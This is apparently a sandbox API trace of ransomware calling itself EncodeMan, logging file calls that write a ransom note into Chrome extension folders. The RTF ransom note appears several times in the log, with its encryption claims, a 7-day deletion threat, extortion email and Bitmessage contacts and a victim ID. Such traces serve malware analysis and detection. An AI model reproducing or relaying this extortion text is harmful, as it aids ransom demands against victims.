\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n\n¯óÈgÑãHÐ\x09K¨?ìc¥àÛ©ü\x0c¥ñs\x01", lpUsedDefaultChar=0x0) returned 8717 [0284.736] WriteFile (in: hFile=0x2ec, lpBuffer=0x248aaf8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x248aaf8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0284.736] CloseHandle (hObject=0x2ec) returned 1 [0284.736] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\#readme_eman#.rtf")) returned 0xffffffff [0284.737] GetLastError () returned 0x2 [0284.737] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\felcaaldnbdncclmgdcncolpebgiejap\\1.1_0\\_locales\\lv\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0284.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0284.737] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x248aaf8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 